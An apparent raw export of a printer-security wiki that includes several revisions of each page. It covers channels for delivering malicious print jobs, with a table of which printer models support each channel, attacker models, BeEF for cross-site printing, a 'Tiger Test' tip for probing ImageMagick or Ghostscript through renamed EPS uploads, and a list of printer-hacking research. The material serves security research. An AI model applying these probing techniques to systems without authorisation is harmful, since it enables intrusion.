|| ✔ || || ✔ || || |- | style="text-align:left;" | HP LaserJet 4250N || ✔ || ✔ || ✔ || ✔ || ✔ || || ✔ |- | style="text-align:left;" | HP LaserJet P2015dn || ✔ || || ✔ || || || ✔ || ✔ |- | style="text-align:left;" | HP LaserJet M2727nfs || ✔ || || ✔ || || || ✔ || ✔ |- | style="text-align:left;" | HP LaserJet 3392 AiO || ✔ || || ✔ || || || ✔ || ✔ |- | style="text-align:left;" | HP Color LaserJet CP1515n || ✔ || || ✔ || || || || ✔ |- | style="text-align:left;" | Brother MFC-9120CN || ✔ || ✔ || ✔ || || ✔ || || ✔ |- | style="text-align:left;" | Brother DCP-9045CDN || ✔ || ✔ || ✔ || || ✔ || || ✔ |- | style="text-align:left;" | Lexmark X264dn || ✔ || ✔ || ✔ || || ✔ || || ✔ |- | style="text-align:left;" | Lexmark E360dn || ✔ || ✔ || ✔ || || ✔ || || ✔ |- | style="text-align:left;" | Lexmark C736dn || ✔ || ✔ || ✔ || || ✔ || || ✔ |- | style="text-align:left;" | Dell 5130cdn || ✔ || ✔ || ✔ || || ✔ || ✔ || ✔ |- | style="text-align:left;" | Dell 1720n || ✔ || ✔ || ✔ || || ✔ || || ✔ |- | style="text-align:left;" | Dell 3110cn || ✔ || || ✔ || || ✔ || || ✔ |- | style="text-align:left;" | Kyocera FS-C5200DN || ✔ || || ✔ || || ✔ || ✔ || ✔ |- | style="text-align:left;" | Samsung CLX-3305W || ✔ || ✔ || ✔ || || || || ✔ |- | style="text-align:left;" | Samsung MultiPress 6345N || ✔ || ✔ || ✔ || ✔ || || || ✔ |- | style="text-align:left;" | Konica bizhub 20p || ✔ || ✔ || ✔ || || ✔ || || ✔ |- | style="text-align:left;" | OKI MC342dn || ✔ || ✔ || ✔ || ✔ || ✔ || ✔ || ✔ |- | style="text-align:left;" | Konica bizhub C454e || ✔ || ✔ || ✔ || ✔ || || ✔ || ✔ |- |} It must be noted that these are not the only possible attack scenarios. For example using social engineering to make a victim print a malicious document is not even covered in this wiki yet – neither are new methods to deploy (potentially malicious) print jobs like cloud-based printing. == Attacker Models == A '''physical attacker''' has the capability to print documents from USB stick or via USB/parallel cable. An (wired or wireless) attacker connecting through a '''TCP/IP network''' can deploy print jobs over LPD, IPP, port 9100/tcp, FTP, SMB and the embedded web server. Under the assumption that no strong user authentication like smart card based access control or SSL client certificates is enforced, both attacker models do obviously have a channel to print which is the precondition for further attacks to be carried out. Both are certainly quite strong attacker models because they require direct access – either physical or logical – to the device. However, in penetration testing scenarios where sneaking into the building is not an option and the printer is not directly reachable over the internet, other deployment channels are required. In such cases, the '''victim's web browser''' can be used as a carrier for printer malware as discussed in [[cross-site printing]]. → ''Related articles:'' [[USB drive or cable]], [[Port 9100 printing]], [[Cross-site printing]] 80e7a19ad536b58a8afcbb4ce5fdcb920c24828d 287 2017-01-28T18:04:49Z Admin 1 Created page with "[[File:Deployment-channels.png|thumb|Overview of channels to deploy a (malicious) print job]] Various channels like [[USB]], [[LPD]], [[IPP]], [[SMB]], or [[raw]] port 9100 p..." wikitext text/x-wiki [[File:Deployment-channels.png|thumb|Overview of channels to deploy a (malicious) print job]] Various channels like [[USB]], [[LPD]], [[IPP]], [[SMB]], or [[raw]] port 9100 printing can be used as carriers to deploy malicious print jobs. While it is possible the attack [[Fundamentals#Network_printing_protocols|printing protocols]] themselves, most attacks discussed in this wiki are targeted for the [[PostScript]] and [[PJL]] interpreters. The payload is just routed by any of the printing channels. This is important to note because it means '''whenever the attacker can somehow ‘print’ she can attack and exploit those interpreters'''. [[File:Printing-overview.png|400px|Attack the interpreters, not the printing channels]] This fact makes it very harder for the blue team ([[Countermeasures#Admins|network administrators]], for example) to defend against printer attacks. Many devices even allow printing (and therefore exploitation) by uploading a raw file to the printer's [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] service or to a form on the embedded web server. To get an impression, an overview of printing channels supported by various printer models is given below. {| class="wikitable" style="text-align:center" |+ Malicious print job deployment channels |- ! Printer model !! LPD !! IPP !! Raw !! Web !! FTP !! SMB !! USB |- | style="text-align:left;" | HP LaserJet 1200 || ✔ || || ✔ || || || || |- | style="text-align:left;" | HP LaserJet 4200N || ✔ || ✔ || ✔ || || ✔ || || |- | style="text-align:left;" | HP LaserJet 4250N || ✔ || ✔ || ✔ || ✔ || ✔ || || ✔ |- | style="text-align:left;" | HP LaserJet P2015dn || ✔ || || ✔ || || || ✔ || ✔ |- | style="text-align:left;" | HP LaserJet M2727nfs || ✔ || || ✔ || || || ✔ || ✔ |- | style="text-align:left;" | HP LaserJet 3392 AiO || ✔ || || ✔ || || || ✔ || ✔ |- | style="text-align:left;" | HP Color LaserJet CP1515n || ✔ || || ✔ || || || || ✔ |- | style="text-align:left;" | Brother MFC-9120CN || ✔ || ✔ || ✔ || || ✔ || || ✔ |- | style="text-align:left;" | Brother DCP-9045CDN || ✔ || ✔ || ✔ || || ✔ || || ✔ |- | style="text-align:left;" | Lexmark X264dn || ✔ || ✔ || ✔ || || ✔ || || ✔ |- | style="text-align:left;" | Lexmark E360dn || ✔ || ✔ || ✔ || || ✔ || || ✔ |- | style="text-align:left;" | Lexmark C736dn || ✔ || ✔ || ✔ || || ✔ || || ✔ |- | style="text-align:left;" | Dell 5130cdn || ✔ || ✔ || ✔ || || ✔ || ✔ || ✔ |- | style="text-align:left;" | Dell 1720n || ✔ || ✔ || ✔ || || ✔ || || ✔ |- | style="text-align:left;" | Dell 3110cn || ✔ || || ✔ || || ✔ || || ✔ |- | style="text-align:left;" | Kyocera FS-C5200DN || ✔ || || ✔ || || ✔ || ✔ || ✔ |- | style="text-align:left;" | Samsung CLX-3305W || ✔ || ✔ || ✔ || || || || ✔ |- | style="text-align:left;" | Samsung MultiPress 6345N || ✔ || ✔ || ✔ || ✔ || || || ✔ |- | style="text-align:left;" | Konica bizhub 20p || ✔ || ✔ || ✔ || || ✔ || || ✔ |- | style="text-align:left;" | OKI MC342dn || ✔ || ✔ || ✔ || ✔ || ✔ || ✔ || ✔ |- | style="text-align:left;" | Konica bizhub C454e || ✔ || ✔ || ✔ || ✔ || || ✔ || ✔ |- |} It must be noted these this are not the only possible attack scenarios. For example using social engineering, to make a victim print a malicious document is not even covered in this wiki yet – neither are new methods to deploy (potentially malicious) print jobs like cloud-based printing. == Attacker Models == A '''physical attacker''' has the capability to print documents from USB stick or via USB/parallel cable. An (wired or wireless) attacker connecting through a '''TCP/IP network''' can deploy print jobs over LPD, IPP, port 9100/tcp, FTP, SMB and the embedded web server. Under the assumption that no strong user authentication like smart card based access control or SSL client certificates is enforced, both attacker models do obviously have a channel to print which is the precondition for further attacks to be carried out. Both are certainly quite strong attacker models because they require direct access – either physical or logical – to the device. However, in penetration testing scenarios where sneaking into the building is not an option and the printer is not directly reachable over the internet, other deployment channels are required. In such cases, the '''victim's web browser''' can be used as a carrier for printer malware as discussed in [[cross-site printing]]. → ''Related aricles:'' [[USB drive or cable]], [[Port 9100 printing]], [[Cross-site printing]] 8d54ae77cdbca61d25e23492f7a26422f36608ff 0 5 100 94 2017-01-10T18:10:31Z 134.147.128.156 0 wikitext text/x-wiki The Browser Exploitation Framework (BeEF) is a penetration testing tool that focuses on the web browser. It allows the penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. BeEF can hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context. '''While BeEF itself is not about printers at all, it is the framework of choice to implement [[cross-site printing]] functionality.''' == External links == * [http://beefproject.com/ Official website] 753c513bc1e31279dc506171d4c842a31f979d99 94 93 2017-01-10T17:22:26Z 134.147.128.156 0 wikitext text/x-wiki The Browser Exploitation Framework (BeEF) is a penetration testing tool that focuses on the web browser. It allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. BeEF can hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context. '''While BeEF itself is not about printers at all, it is the framework of choice to implement [[cross-site printing]] functionality.''' == External links == * [http://beefproject.com/ Official website] b7b624979742d72f873bc775e272759d498ebf27 93 7 2017-01-10T17:21:54Z 134.147.128.156 0 wikitext text/x-wiki The Browser Exploitation Framework (BeEF) is a penetration testing tool that focuses on the web browser. It allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. BeEF can hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context. '''While BeEF itself is not about printers at all, it is the framework of choice to implement [[cross-site printing]] functionality.''' == External links == * [http://beefproject.com/ Official website] 30877fc6c723ba8350b17597566a5637de44fdf9 7 2016-11-22T09:51:04Z Admin 1 Created page with "http://beefproject.com/ BeEF is not about printers, however XSP functionality can be implemented here" wikitext text/x-wiki http://beefproject.com/ BeEF is not about printers, however XSP functionality can be implemented here ec9c1ac391bbd13e5b6da875a56eb808dcc93eeb 0 12 164 32 2017-01-20T15:44:46Z 77.182.101.158 0 Blanked the page wikitext text/x-wiki da39a3ee5e6b4b0d3255bfef95601890afd80709 32 31 2017-01-02T10:13:47Z Admin 1 wikitext text/x-wiki First: "Tiger Test" If the website allows image uploads, try renaming tiger.eps to tiger.jpg and upload it (works if ImageMagick's "convert" is used in the background and the web application does not check the file header, see ImageTragick) If the website allows PDF uploafs, try renaming tiger.eps to tiger.pdf and upload it (works if Ghostscript is used in the background and the web application does not check the file header, %PDF- is okay!) == Web Applications == -> just use cheat sheet, look at conversion result == Print Servers == -> just use cheat sheet, look at printed document == Desktop Applications == -> harder because of backchannel; thunderbird-convert? Hard to get a backchannel if no CVE 6942389390cb7ca1494276ccc5805c4dabb130c0 31 30 2017-01-02T10:13:06Z Admin 1 wikitext text/x-wiki First: "Tiger Test" If the website allows image uploads, try renaming tiger.eps to tiger.jpg and upload it (works if ImageMagick's "convert" is used in the background and the web application does not check the file header, see ImageTragick) If the website allows PDF uploafs, try renaming tiger.eps to tiger.pdf and upload it (works if Ghostscript is used in the background and the web application does not check the file header, %PDF- is okay!) == Web Applications == -> just use cheat sheet == Print Servers == -> just use cheat sheet == Desktop Applications == -> harder because of backchannel; thunderbird-convert? Hard to get a backchannel if no CVE e0d193ff00ed3a9ee193225021e4f0d198acb907 30 2016-12-31T11:15:33Z Admin 1 Created page with "First: "Tiger Test" If the website allows image uploads, try renaming tiger.eps to tiger.jpg and upload it (works if ImageMagick's "convert" is used in the background and the..." wikitext text/x-wiki First: "Tiger Test" If the website allows image uploads, try renaming tiger.eps to tiger.jpg and upload it (works if ImageMagick's "convert" is used in the background and the web application does not check the file header, see ImageTragick) If the website allows PDF uploafs, try renaming tiger.eps to tiger.pdf and upload it (works if Ghostscript is used in the background and the web application does not check the file header, %PDF- is okay!) 9d3c1ac065b6fe0d1509f2f87f89eb8e7bf3d2ba 0 11 650 293 2018-07-11T11:05:41Z Admin 1 wikitext text/x-wiki == Research by date == === 2017 === '''SoK: Exploiting Network Printers''' ([https://www.nds.rub.de/media/ei/veroeffentlichungen/2018/07/11/printer-security.pdf PDF]) <br>by Jens Müller, Juraj Somorovsky, Vladislav Mladenov | Blogpost: [http://web-in-security.blogspot.de/2017/01/printer-security.html] === 2016 === '''Exploiting Network Printers: A Survey of Security Flaws in Laser Printers and Multi-Function Devices''' ([https://www.nds.rub.de/media/ei/arbeiten/2017/01/30/exploiting-printers.pdf PDF]) <br>by Jens Müller, Juraj Somorovsky, Vladislav Mladenov | Proof-of-concept code: [https://github.com/RUB-NDS/PRET] '''PWN Xerox Printers (...again): About Hardware Attacks and Insecure Cloning''' ([https://www.fkie.fraunhofer.de/content/dam/fkie/de/documents/xerox_phaser_6700_white_paper.pdf PDF]) <br>by Peter Weidenbach, Raphael Ernst === 2014 === '''A Large-Scale Analysis of the Security of Embedded Firmwares''' ([https://www.usenix.org/system/files/conference/usenixsecurity14/sec14-paper-costin.pdf PDF]) <br>by Andrei Costin, Jonas Zaddach, Aurélien Francillon, and Davide Balzarotti | Video: [https://www.youtube.com/watch?v=5gf6mFz1rPM] '''Hacking Canon Pixma Printers - Doomed Encryption''' ([http://www.contextis.com/resources/blog/hacking-canon-pixma-printers-doomed-encryption/ HTML]) <br>by Michael Jordon === 2013 === '''Embedded Devices Security and Firmware Reverse Engineering''' ([http://s3.eurecom.fr/docs/bh13us_zaddach.pdf PDF]) <br>by Jonas Zaddach, Andrei Costin '''Research Report on the Security of MFPs''' ([https://www.ipa.go.jp/security/jisec/apdx/documents/20130312report_E.pdf]) <br>by IPA Information-technology Promotion Agency, Japan === 2012 === '''PostScript: Danger Ahead?!''' <br>by Andrei Costin | Slides: [https://infocon.org/cons/Hack%20In%20Paris/Hack%20In%20Paris%202012/Slides/Andrei-PostScript%20Danger%20Ahead.pdf] | Video: [https://www.youtube.com/watch?v=ygcs0m5C9ZI] === 2011 === '''Print Me If You Dare: Firmware Modification Attacks and the Rise of Printer Malware''' <br>by Ang Cui, Salvatore Stolfo | Slides: [http://ids.cs.columbia.edu/sites/default/files/CuiPrintMeIfYouDare.pdf] | Video: [https://www.youtube.com/watch?v=njVv7J2azY8] '''Printers gone Wild (PrintFS PJL filesystem)''' <br>by Ben Smith | Video: [http://www.securitytube.net/video/1395] | Proof-of-concept code: [http://www.remote-exploit.org/articles/printfs/index.html] '''From Printer to Pwnd: Leveraging Multifunction Printers During Penetration Testing''' <br>by Deral Heiland | Slides: [http://foofus.net/goons/percx/defcon/P2PWND.pdf] | Video: [https://www.youtube.com/watch?v=PH4pTCmKgOg] | Proof-of-concept code: [https://github.com/percx/Praeda] '''From Patched to Pwned: Attacking Xerox's Multifunction Printers Patch Process''' ([http://foofus.net/goons/percx/Xerox_hack.pdf PDF]) <br>by Deral Heiland === 2010 === '''Hacking Printers for Fun and Profit''' <br>by Andrei Costin | Slides: [http://andreicostin.com/papers/Conf%20-%20Hack.lu%20-%202010%20-%20Luxembourg%20-%20AndreiCostin_HackingPrintersForFunAndProfit.pdf] | Video: [https://www.youtube.com/watch?v=R56ZXErKCeE] '''Juste une imprimant?''' <br>by NBS System | Slides: [http://www.ossir.org/jssi/jssi2010/1A.pdf] === 2006 === '''Hacking Network Printers''' ([http://www.irongeek.com/i.php?page=security/networkprinterhacking HTML]) <br>by Adrian Crenshaw (Irongeek) === 2002 === '''Understanding, Reversing, and Hacking HP Printers''' ([http://search.lores.eu/realicra/hp_slobo.htm HTML]) <br>by Slobotron '''Printer Exploration (PFT and Hijetter, libPJL, ChaiPortScan, ChaiCrack)''' <br>FtR of Phenoelit, FX of Phenoelit | Proof-of-concept code: [http://www.phenoelit.org/hp/index.html] bfd1188231d8e2df37a118d9ffbfadfecfc04d4f 293 292 2017-01-30T15:55:04Z 134.147.202.176 0 /* Research by date */ wikitext text/x-wiki == Research by date == === 2017 === '''SoK: Exploiting Network Printers''' ([https://www.nds.rub.de/media/ei/veroeffentlichungen/2017/01/30/printer-security.pdf PDF]) <br>by Jens Müller, Juraj Somorovsky, Vladislav Mladenov | Blogpost: [http://web-in-security.blogspot.de/2017/01/printer-security.html] === 2016 === '''Exploiting Network Printers: A Survey of Security Flaws in Laser Printers and Multi-Function Devices''' ([https://www.nds.rub.de/media/ei/arbeiten/2017/01/30/exploiting-printers.pdf PDF]) <br>by Jens Müller, Juraj Somorovsky, Vladislav Mladenov | Proof-of-concept code: [https://github.com/RUB-NDS/PRET] '''PWN Xerox Printers (...again): About Hardware Attacks and Insecure Cloning''' ([https://www.fkie.fraunhofer.de/content/dam/fkie/de/documents/xerox_phaser_6700_white_paper.pdf PDF]) <br>by Peter Weidenbach, Raphael Ernst === 2014 === '''A Large-Scale Analysis of the Security of Embedded Firmwares''' ([https://www.usenix.org/system/files/conference/usenixsecurity14/sec14-paper-costin.pdf PDF]) <br>by Andrei Costin, Jonas Zaddach, Aurélien Francillon, and Davide Balzarotti | Video: [https://www.youtube.com/watch?v=5gf6mFz1rPM] '''Hacking Canon Pixma Printers - Doomed Encryption''' ([http://www.contextis.com/resources/blog/hacking-canon-pixma-printers-doomed-encryption/ HTML]) <br>by Michael Jordon === 2013 === '''Embedded Devices Security and Firmware Reverse Engineering''' ([http://s3.eurecom.fr/docs/bh13us_zaddach.pdf PDF]) <br>by Jonas Zaddach, Andrei Costin '''Research Report on the Security of MFPs''' ([https://www.ipa.go.jp/security/jisec/apdx/documents/20130312report_E.pdf]) <br>by IPA Information-technology Promotion Agency, Japan === 2012 === '''PostScript: Danger Ahead?!''' <br>by Andrei Costin | Slides: [https://infocon.org/cons/Hack%20In%20Paris/Hack%20In%20Paris%202012/Slides/Andrei-PostScript%20Danger%20Ahead.pdf] | Video: [https://www.youtube.com/watch?v=ygcs0m5C9ZI] === 2011 === '''Print Me If You Dare: Firmware Modification Attacks and the Rise of Printer Malware''' <br>by Ang Cui, Salvatore Stolfo | Slides: [http://ids.cs.columbia.edu/sites/default/files/CuiPrintMeIfYouDare.pdf] | Video: [https://www.youtube.com/watch?v=njVv7J2azY8] '''Printers gone Wild (PrintFS PJL filesystem)''' <br>by Ben Smith | Video: [http://www.securitytube.net/video/1395] | Proof-of-concept code: [http://www.remote-exploit.org/articles/printfs/index.html] '''From Printer to Pwnd: Leveraging Multifunction Printers During Penetration Testing''' <br>by Deral Heiland | Slides: [http://foofus.net/goons/percx/defcon/P2PWND.pdf] | Video: [https://www.youtube.com/watch?v=PH4pTCmKgOg] | Proof-of-concept code: [https://github.com/percx/Praeda] '''From Patched to Pwned: Attacking Xerox's Multifunction Printers Patch Process''' ([http://foofus.net/goons/percx/Xerox_hack.pdf PDF]) <br>by Deral Heiland === 2010 === '''Hacking Printers for Fun and Profit''' <br>by Andrei Costin | Slides: [http://andreicostin.com/papers/Conf%20-%20Hack.lu%20-%202010%20-%20Luxembourg%20-%20AndreiCostin_HackingPrintersForFunAndProfit.pdf] | Video: [https://www.youtube.com/watch?v=R56ZXErKCeE] '''Juste une imprimant?''' <br>by NBS System | Slides: [http://www.ossir.org/jssi/jssi2010/1A.pdf] === 2006 === '''Hacking Network Printers''' ([http://www.irongeek.com/i.php?page=security/networkprinterhacking HTML]) <br>by Adrian Crenshaw (Irongeek) === 2002 === '''Understanding, Reversing, and Hacking HP Printers''' ([http://search.lores.eu/realicra/hp_slobo.htm HTML]) <br>by Slobotron '''Printer Exploration (PFT and Hijetter, libPJL, ChaiPortScan, ChaiCrack)''' <br>FtR of Phenoelit, FX of Phenoelit | Proof-of-concept code: [http://www.phenoelit.org/hp/index.html] 20f5b18771d45dec21e3bed23cd8193f38d0a4af 292 162 2017-01-30T15:51:14Z 134.147.202.176 0 wikitext text/x-wiki == Research by date == === 2016 === '''Exploiting Network Printers: A Survey of Security Flaws in Laser Printers and Multi-Function Devices''' ([https://www.nds.rub.de/media/ei/arbeiten/2017/01/30/exploiting-printers.pdf PDF]) <br>by Jens Müller, Juraj Somorovsky, Vladislav Mladenov | Proof-of-concept code: [https://github.com/RUB-NDS/PRET] '''PWN Xerox Printers (...again): About Hardware Attacks and Insecure Cloning''' ([https://www.fkie.fraunhofer.de/content/dam/fkie/de/documents/xerox_phaser_6700_white_paper.pdf PDF]) <br>by Peter Weidenbach, Raphael Ernst === 2014 === '''A Large-Scale Analysis of the Security of Embedded Firmwares''' ([https://www.usenix.org/system/files/conference/usenixsecurity14/sec14-paper-costin.pdf PDF]) <br>by Andrei Costin, Jonas Zaddach, Aurélien Francillon, and Davide Balzarotti | Video: [https://www.youtube.com/watch?v=5gf6mFz1rPM] '''Hacking Canon Pixma Printers - Doomed Encryption''' ([http://www.contextis.com/resources/blog/hacking-canon-pixma-printers-doomed-encryption/ HTML]) <br>by Michael Jordon === 2013 === '''Embedded Devices Security and Firmware Reverse Engineering''' ([http://s3.eurecom.fr/docs/bh13us_zaddach.pdf PDF]) <br>by Jonas Zaddach, Andrei Costin '''Research Report on the Security of MFPs''' ([https://www.ipa.go.jp/security/jisec/apdx/documents/20130312report_E.pdf]) <br>by IPA Information-technology Promotion Agency, Japan === 2012 === '''PostScript: Danger Ahead?!''' <br>by Andrei Costin | Slides: [https://infocon.org/cons/Hack%20In%20Paris/Hack%20In%20Paris%202012/Slides/Andrei-PostScript%20Danger%20Ahead.pdf] | Video: [https://www.youtube.com/watch?v=ygcs0m5C9ZI] === 2011 === '''Print Me If You Dare: Firmware Modification Attacks and the Rise of Printer Malware''' <br>by Ang Cui, Salvatore Stolfo | Slides: [http://ids.cs.columbia.edu/sites/default/files/CuiPrintMeIfYouDare.pdf] | Video: [https://www.youtube.com/watch?v=njVv7J2azY8] '''Printers gone Wild (PrintFS PJL filesystem)''' <br>by Ben Smith | Video: [http://www.securitytube.net/video/1395] | Proof-of-concept code: [http://www.remote-exploit.org/articles/printfs/index.html] '''From Printer to Pwnd: Leveraging Multifunction Printers During Penetration Testing''' <br>by Deral Heiland | Slides: [http://foofus.net/goons/percx/defcon/P2PWND.pdf] | Video: [https://www.youtube.com/watch?v=PH4pTCmKgOg] | Proof-of-concept code: [https://github.com/percx/Praeda] '''From Patched to Pwned: Attacking Xerox's Multifunction Printers Patch Process''' ([http://foofus.net/goons/percx/Xerox_hack.pdf PDF]) <br>by Deral Heiland === 2010 === '''Hacking Printers for Fun and Profit''' <br>by Andrei Costin | Slides: [http://andreicostin.com/papers/Conf%20-%20Hack.lu%20-%202010%20-%20Luxembourg%20-%20AndreiCostin_HackingPrintersForFunAndProfit.pdf] | Video: [https://www.youtube.com/watch?v=R56ZXErKCeE] '''Juste une imprimant?''' <br>by NBS System | Slides: [http://www.ossir.org/jssi/jssi2010/1A.pdf] === 2006 === '''Hacking Network Printers''' ([http://www.irongeek.com/i.php?page=security/networkprinterhacking HTML]) <br>by Adrian Crenshaw (Irongeek) === 2002 === '''Understanding, Reversing, and Hacking HP Printers''' ([http://search.lores.eu/realicra/hp_slobo.htm HTML]) <br>by Slobotron '''Printer Exploration (PFT and Hijetter, libPJL, ChaiPortScan, ChaiCrack)''' <br>FtR of Phenoelit, FX of Phenoelit | Proof-of-concept code: [http://www.phenoelit.org/hp/index.html] eb5cec75a74a757209bb9610c0475f5ca25184d9 162 55 2017-01-15T17:27:48Z 92.227.58.56 0 wikitext text/x-wiki == Research by date == === 2016 === '''Exploiting Network Printers: A Survey of Security Flaws in Laser Printers and Multi-Function Devices''' ([TBD PDF]) <br>by Jens Müller, Juraj Somorovsky, Vladislav Mladenov | Proof-of-concept code: [https://github.com/RUB-NDS/PRET] '''PWN Xerox Printers (...again): About Hardware Attacks and Insecure Cloning''' ([https://www.fkie.fraunhofer.de/content/dam/fkie/de/documents/xerox_phaser_6700_white_paper.pdf PDF]) <br>by Peter Weidenbach, Raphael Ernst === 2014 === '''A Large-Scale Analysis of the Security of Embedded Firmwares''' ([https://www.usenix.org/system/files/conference/usenixsecurity14/sec14-paper-costin.pdf PDF]) <br>by Andrei Costin, Jonas Zaddach, Aurélien Francillon, and Davide Balzarotti | Video: [https://www.youtube.com/watch?v=5gf6mFz1rPM] '''Hacking Canon Pixma Printers - Doomed Encryption''' ([http://www.contextis.com/resources/blog/hacking-canon-pixma-printers-doomed-encryption/ HTML]) <br>by Michael Jordon === 2013 === '''Embedded Devices Security and Firmware Reverse Engineering''' ([http://s3.eurecom.fr/docs/bh13us_zaddach.pdf PDF]) <br>by Jonas Zaddach, Andrei Costin '''Research Report on the Security of MFPs''' ([https://www.ipa.go.jp/security/jisec/apdx/documents/20130312report_E.pdf]) <br>by IPA Information-technology Promotion Agency, Japan === 2012 === '''PostScript: Danger Ahead?!''' <br>by Andrei Costin | Slides: [https://infocon.org/cons/Hack%20In%20Paris/Hack%20In%20Paris%202012/Slides/Andrei-PostScript%20Danger%20Ahead.pdf] | Video: [https://www.youtube.com/watch?v=ygcs0m5C9ZI] === 2011 === '''Print Me If You Dare: Firmware Modification Attacks and the Rise of Printer Malware''' <br>by Ang Cui, Salvatore Stolfo | Slides: [http://ids.cs.columbia.edu/sites/default/files/CuiPrintMeIfYouDare.pdf] | Video: [https://www.youtube.com/watch?v=njVv7J2azY8] '''Printers gone Wild (PrintFS PJL filesystem)''' <br>by Ben Smith | Video: [http://www.securitytube.net/video/1395] | Proof-of-concept code: [http://www.remote-exploit.org/articles/printfs/index.html] '''From Printer to Pwnd: Leveraging Multifunction Printers During Penetration Testing''' <br>by Deral Heiland | Slides: [http://foofus.net/goons/percx/defcon/P2PWND.pdf] | Video: [https://www.youtube.com/watch?v=PH4pTCmKgOg] | Proof-of-concept code: [https://github.com/percx/Praeda] '''From Patched to Pwned: Attacking Xerox's Multifunction Printers Patch Process''' ([http://foofus.net/goons/percx/Xerox_hack.pdf PDF]) <br>by Deral Heiland === 2010 === '''Hacking Printers for Fun and Profit''' <br>by Andrei Costin | Slides: [http://andreicostin.com/papers/Conf%20-%20Hack.lu%20-%202010%20-%20Luxembourg%20-%20AndreiCostin_HackingPrintersForFunAndProfit.pdf] | Video: [https://www.youtube.com/watch?v=R56ZXErKCeE] '''Juste une imprimant?''' <br>by NBS System | Slides: [http://www.ossir.org/jssi/jssi2010/1A.pdf] === 2006 === '''Hacking Network Printers''' ([http://www.irongeek.com/i.php?page=security/networkprinterhacking HTML]) <br>by Adrian Crenshaw (Irongeek) === 2002 === '''Understanding, Reversing, and Hacking HP Printers''' ([http://search.lores.eu/realicra/hp_slobo.htm HTML]) <br>by Slobotron '''Printer Exploration (PFT and Hijetter, libPJL, ChaiPortScan, ChaiCrack)''' <br>FtR of Phenoelit, FX of Phenoelit | Proof-of-concept code: [http://www.phenoelit.org/hp/index.html] 405344b4f206a9d8628bf350f1ab47d6a309e588 55 54 2017-01-05T17:25:36Z Admin 1 wikitext text/x-wiki == Research by date == === 2016 === '''Exploiting Network Printers: A Survey of Security Flaws in Laser Printers and Multi-Function Devices''' ([http://homepages.rub.de/jens.mueller-2/publications/2016-exploiting-network-printers.pdf PDF]) <br>by Jens Müller, Juraj Somorovsky, Vladislav Mladenov | Proof-of-concept code: [https://github.com/RUB-NDS/PRET] '''PWN Xerox Printers (...again): About Hardware Attacks and Insecure Cloning''' ([https://www.fkie.fraunhofer.de/content/dam/fkie/de/documents/xerox_phaser_6700_white_paper.pdf PDF]) <br>by Peter Weidenbach, Raphael Ernst === 2014 === '''A Large-Scale Analysis of the Security of Embedded Firmwares''' ([https://www.usenix.org/system/files/conference/usenixsecurity14/sec14-paper-costin.pdf PDF]) <br>by Andrei Costin, Jonas Zaddach, Aurélien Francillon, and Davide Balzarotti | Video: [https://www.youtube.com/watch?v=5gf6mFz1rPM] '''Hacking Canon Pixma Printers - Doomed Encryption''' ([http://www.contextis.com/resources/blog/hacking-canon-pixma-printers-doomed-encryption/ HTML]) <br>by Michael Jordon === 2013 === '''Embedded Devices Security and Firmware Reverse Engineering''' ([http://s3.eurecom.fr/docs/bh13us_zaddach.pdf PDF]) <br>by Jonas Zaddach, Andrei Costin '''Research Report on the Security of MFPs''' ([https://www.ipa.go.jp/security/jisec/apdx/documents/20130312report_E.pdf]) <br>by IPA Information-technology Promotion Agency, Japan === 2012 === '''PostScript: Danger Ahead?!''' <br>by Andrei Costin | Slides: [https://infocon.org/cons/Hack%20In%20Paris/Hack%20In%20Paris%202012/Slides/Andrei-PostScript%20Danger%20Ahead.pdf] | Video: [https://www.youtube.com/watch?v=ygcs0m5C9ZI] === 2011 === '''Print Me If You Dare: Firmware Modification Attacks and the Rise of Printer Malware''' <br>by Ang Cui, Salvatore Stolfo | Slides: [http://ids.cs.columbia.edu/sites/default/files/CuiPrintMeIfYouDare.pdf] | Video: [https://www.youtube.com/watch?v=njVv7J2azY8] '''Printers gone Wild (PrintFS PJL filesystem)''' <br>by Ben Smith | Video: [http://www.securitytube.net/video/1395] | Proof-of-concept code: [http://www.remote-exploit.org/articles/printfs/index.html] '''From Printer to Pwnd: Leveraging Multifunction Printers During Penetration Testing''' <br>by Deral Heiland | Slides: [http://foofus.net/goons/percx/defcon/P2PWND.pdf] | Video: [https://www.youtube.com/watch?v=PH4pTCmKgOg] | Proof-of-concept code: [https://github.com/percx/Praeda] '''From Patched to Pwned: Attacking Xerox's Multifunction Printers Patch Process''' ([http://foofus.net/goons/percx/Xerox_hack.pdf PDF]) <br>by Deral Heiland === 2010 === '''Hacking Printers for Fun and Profit''' <br>by Andrei Costin | Slides: [http://andreicostin.com/papers/Conf%20-%20Hack.lu%20-%202010%20-%20Luxembourg%20-%20AndreiCostin_HackingPrintersForFunAndProfit.pdf] | Video: [https://www.youtube.com/watch?v=R56ZXErKCeE] '''Juste une imprimant?''' <br>by NBS System | Slides: [http://www.ossir.org/jssi/jssi2010/1A.pdf] === 2006 === '''Hacking Network Printers''' ([http://www.irongeek.com/i.php?page=security/networkprinterhacking HTML]) <br>by Adrian Crenshaw (Irongeek) === 2002 === '''Understanding, Reversing, and Hacking HP Printers''' ([http://search.lores.eu/realicra/hp_slobo.htm HTML]) <br>by Slobotron '''Printer Exploration (PFT and Hijetter, libPJL, ChaiPortScan, ChaiCrack)''' <br>FtR of Phenoelit, FX of Phenoelit | Proof-of-concept code: [http://www.phenoelit.org/hp/index.html] c93df397ca98cee8faa75e59506319273e5dbcb3 54 53 2017-01-05T17:13:24Z Admin 1 wikitext text/x-wiki == Research by date == === 2016 === '''Exploiting Network Printers: A Survey of Security Flaws in Laser Printers and Multi-Function Devices''' ([http://homepages.rub.de/jens.mueller-2/publications/2016-exploiting-network-printers.pdf PDF]) <br>by Jens Müller, Juraj Somorovsky, Vladislav Mladenov | Proof-of-concept code: [https://github.com/RUB-NDS/PRET] '''PWN Xerox Printers (...again): About Hardware Attacks and Insecure Cloning''' ([https://www.fkie.fraunhofer.de/content/dam/fkie/de/documents/xerox_phaser_6700_white_paper.pdf PDF]) <br>by Peter Weidenbach, Raphael Ernst === 2014 === '''A Large-Scale Analysis of the Security of Embedded Firmwares''' ([https://www.usenix.org/system/files/conference/usenixsecurity14/sec14-paper-costin.pdf PDF]) <br>by 